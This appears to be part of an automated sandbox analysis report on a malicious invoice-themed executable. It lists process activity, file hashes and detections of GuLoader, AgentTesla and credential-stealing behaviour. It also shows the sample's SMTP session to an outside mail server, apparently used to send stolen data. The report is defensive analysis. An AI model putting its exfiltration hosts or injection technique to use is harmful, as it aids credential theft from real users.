                                            Data Ascii: ;2wEQ\O:(tc(Hs{x+},P8O.Bzs2#LW<j5t7/!k_9lvQeP6@T%[9<?6G|ChZ=MGh(YG_sz0CsdaBk|n:JZW)Uv/#D:G<


                                            SMTP Packets

                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Nov 24, 2021 15:42:18.366720915 CET58749806116.202.203.61192.168.11.20220-server.infomedya.net ESMTP Exim 4.94.2 #2 Wed, 24 Nov 2021 17:42:18 +0300
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Nov 24, 2021 15:42:18.367290020 CET49806587192.168.11.20116.202.203.61EHLO 114127
                                            Nov 24, 2021 15:42:18.380419016 CET58749806116.202.203.61192.168.11.20250-server.infomedya.net Hello 114127 [102.129.143.99]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-STARTTLS
                                            250 HELP
                                            Nov 24, 2021 15:42:18.380800009 CET49806587192.168.11.20116.202.203.61STARTTLS
                                            Nov 24, 2021 15:42:18.397994041 CET58749806116.202.203.61192.168.11.20220 TLS go ahead

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:15:39:54
                                            Start date:24/11/2021
                                            Path:C:\Users\user\Desktop\FACTURAS.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\FACTURAS.exe"
                                            Imagebase:0x400000
                                            File size:135168 bytes
                                            MD5 hash:AB63F9BA38D9EB4F8BD57AE56A844A31
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Visual Basic
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2778328367.0000000002290000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:15:40:17
                                            Start date:24/11/2021
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\FACTURAS.exe"
                                            Imagebase:0x360000
                                            File size:108664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:15:40:17
                                            Start date:24/11/2021
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\FACTURAS.exe"
                                            Imagebase:0x840000
                                            File size:108664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.2516869676.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:15:40:17
                                            Start date:24/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6a8e70000
                                            File size:875008 bytes
                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:15:46:18
                                            Start date:24/11/2021
                                            Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                            Imagebase:0x7ff6afbc0000
                                            File size:57856 bytes
                                            MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis

                                            Reset < >